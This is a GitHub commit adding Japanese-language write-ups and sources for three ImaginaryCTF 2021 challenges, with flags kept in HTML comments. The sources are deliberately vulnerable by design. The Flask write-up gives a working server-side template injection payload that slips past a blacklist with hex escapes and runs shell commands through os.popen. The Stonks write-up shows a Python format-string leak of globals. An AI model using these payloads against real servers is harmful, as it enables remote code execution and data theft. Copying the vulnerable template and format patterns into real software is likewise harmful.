Skip to content

Commit 573021e

Browse files
author
JP-kazne
committed
[Add] ImaginaryCTF 2021
1 parent 373f99e commit 573021e

30 files changed

Lines changed: 694 additions & 0 deletions

2021/ImaginaryCTF_2021/.gitignore

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
Flip_Flops/
Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
**Description**
2+
3+
I made a website where y'all can create your own websites! Should be considerably secure even though I'm a bit rusty with Flask.
4+
5+
**Attachments**
6+
7+
[https://imaginaryctf.org/r/3ACF-app.py](https://imaginaryctf.org/r/3ACF-app.py) [http://build-a-website.chal.imaginaryctf.org/](http://build-a-website.chal.imaginaryctf.org/)
8+
9+
**Author**
10+
11+
Eth007
Lines changed: 29 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,29 @@
1+
#!/usr/bin/env python3
2+
3+
from flask import Flask, render_template_string, request, redirect, url_for
4+
from base64 import b64encode, b64decode
5+
6+
app = Flask(__name__)
7+
8+
@app.route('/')
9+
def index():
10+
# i dont remember how to return a string in flask so
11+
# here goes nothing :rooNervous:
12+
return render_template_string(open('templates/index.html').read())
13+
14+
@app.route('/backend')
15+
def backend():
16+
website_b64 = b64encode(request.args['content'].encode())
17+
return redirect(url_for('site', content=website_b64))
18+
19+
@app.route('/site')
20+
def site():
21+
content = b64decode(request.args['content']).decode()
22+
#prevent xss
23+
blacklist = ['script', 'iframe', 'cookie', 'document', "las", "bas", "bal", ":roocursion:"] # no roocursion allowed
24+
for word in blacklist:
25+
if word in content:
26+
# this should scare them away
27+
content = "*** stack smashing detected ***: python3 terminated"
28+
csp = '''<head>\n<meta http-equiv="Content-Security-Policy" content="default-src 'none'">\n</head>\n'''
29+
return render_template_string(csp + content)
Lines changed: 59 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,59 @@
1+
# Writeup
2+
3+
以下のソースコードが与えられる。
4+
5+
```py
6+
#!/usr/bin/env python3
7+
8+
from flask import Flask, render_template_string, request, redirect, url_for
9+
from base64 import b64encode, b64decode
10+
11+
app = Flask(__name__)
12+
13+
@app.route('/')
14+
def index():
15+
# i dont remember how to return a string in flask so
16+
# here goes nothing :rooNervous:
17+
return render_template_string(open('templates/index.html').read())
18+
19+
@app.route('/backend')
20+
def backend():
21+
website_b64 = b64encode(request.args['content'].encode())
22+
return redirect(url_for('site', content=website_b64))
23+
24+
@app.route('/site')
25+
def site():
26+
content = b64decode(request.args['content']).decode()
27+
#prevent xss
28+
blacklist = ['script', 'iframe', 'cookie', 'document', "las", "bas", "bal", ":roocursion:"] # no roocursion allowed
29+
for word in blacklist:
30+
if word in content:
31+
# this should scare them away
32+
content = "*** stack smashing detected ***: python3 terminated"
33+
csp = '''<head>\n<meta http-equiv="Content-Security-Policy" content="default-src 'none'">\n</head>\n'''
34+
return render_template_string(csp + content)
35+
```
36+
37+
Flask の SSTI が使えることが分かった。
38+
39+
`global``bal`等がブラックリストに登録されているが、`a = 0x61`とすればすり抜けられる。
40+
41+
以下を入力すると、
42+
43+
```
44+
{{request['application']['\x5f\x5fglob\x61ls\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('ls')['read']()}}
45+
```
46+
47+
```
48+
app.py flag.txt templates
49+
```
50+
51+
と表示された。
52+
53+
よって、以下を入力することにより、`flag.txt`の中身を見ることができる。
54+
55+
```
56+
{{request['application']['\x5f\x5fglob\x61ls\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('cat flag.txt')['read']()}}
57+
```
58+
59+
<!-- ictf{:rooYay:_:rooPOG:_:rooHappy:_:rooooooooooooooooooooooooooo:} -->
Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
**Description**
2+
3+
I remember the good old days when Caesar ciphers were easy…
4+
5+
**Attachments**
6+
7+
[https://imaginaryctf.org/r/5363-chicken-caesar-salad.txt](https://imaginaryctf.org/r/5363-chicken-caesar-salad.txt)
8+
9+
**Author**
10+
11+
FIREPONY57
Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
qkbn{ePmv_lQL_kIMamZ_kQxpMZa_oMb_aW_pIZl}
Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
# Writeup
2+
3+
以下のテキストが与えられる。
4+
5+
```
6+
qkbn{ePmv_lQL_kIMamZ_kQxpMZa_oMb_aW_pIZl}
7+
```
8+
9+
ROT18したところ、フラグが得られた。
10+
11+
<!-- ictf{wHen_dID_cAEseR_cIphERs_gEt_sO_hARd} -->
Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
**Description**
2+
3+
Wait, I thought format strings were only in C???
4+
5+
**Attachments**
6+
7+
[https://imaginaryctf.org/r/14BD-stonks.py](https://imaginaryctf.org/r/14BD-stonks.py) `nc chal.imaginaryctf.org 42014`
8+
9+
**Author**
10+
11+
Eth007
Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
#!/usr/bin/env python3
2+
3+
art = '''
4+
88
5+
,d 88
6+
88 88
7+
,adPPYba, MM88MMM ,adPPYba, 8b,dPPYba, 88 ,d8 ,adPPYba,
8+
I8[ "" 88 a8" "8a 88P' `"8a 88 ,a8" I8[ ""
9+
`"Y8ba, 88 8b d8 88 88 8888[ `"Y8ba,
10+
aa ]8I 88, "8a, ,a8" 88 88 88`"Yba, aa ]8I
11+
`"YbbdP"' "Y888 `"YbbdP"' 88 88 88 `Y8a `"YbbdP"'
12+
'''
13+
14+
flag = open("flag.txt").read()
15+
16+
class stonkgenerator: # I heard object oriented programming is popular
17+
def __init__(self):
18+
pass
19+
def __str__(self):
20+
return "stonks"
21+
22+
def main():
23+
print(art)
24+
print("Welcome to Stonks as a Service!")
25+
print("Enter any input, and we'll say it back to you with any '{a}' replaced with 'stonks'! Try it out!")
26+
while True:
27+
inp = input("> ")
28+
print(inp.format(a=stonkgenerator()))
29+
30+
if __name__ == "__main__":
31+
main()
Lines changed: 51 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,51 @@
1+
# Writeup
2+
3+
以下のプログラムが与えられる。
4+
5+
```py
6+
#!/usr/bin/env python3
7+
8+
art = '''
9+
88
10+
,d 88
11+
88 88
12+
,adPPYba, MM88MMM ,adPPYba, 8b,dPPYba, 88 ,d8 ,adPPYba,
13+
I8[ "" 88 a8" "8a 88P' `"8a 88 ,a8" I8[ ""
14+
`"Y8ba, 88 8b d8 88 88 8888[ `"Y8ba,
15+
aa ]8I 88, "8a, ,a8" 88 88 88`"Yba, aa ]8I
16+
`"YbbdP"' "Y888 `"YbbdP"' 88 88 88 `Y8a `"YbbdP"'
17+
'''
18+
19+
flag = open("flag.txt").read()
20+
21+
class stonkgenerator: # I heard object oriented programming is popular
22+
def __init__(self):
23+
pass
24+
def __str__(self):
25+
return "stonks"
26+
27+
def main():
28+
print(art)
29+
print("Welcome to Stonks as a Service!")
30+
print("Enter any input, and we'll say it back to you with any '{a}' replaced with 'stonks'! Try it out!")
31+
while True:
32+
inp = input("> ")
33+
print(inp.format(a=stonkgenerator()))
34+
35+
if __name__ == "__main__":
36+
main()
37+
```
38+
39+
`print(inp.format(a=stonkgenerator()))`の部分で`flag`を表示させれば良さそう。
40+
41+
* [Vulnerability in str.format() in Python](https://www.geeksforgeeks.org/vulnerability-in-str-format-in-python/)
42+
43+
上記サイトの通り、
44+
45+
```
46+
{a.__init__.__globals__[flag]}
47+
```
48+
49+
を入力したところ、フラグが出力された。
50+
51+
<!-- ictf{c4r3rul_w1th_f0rmat_str1ngs_4a2bd219} -->

0 commit comments

Comments
 (0)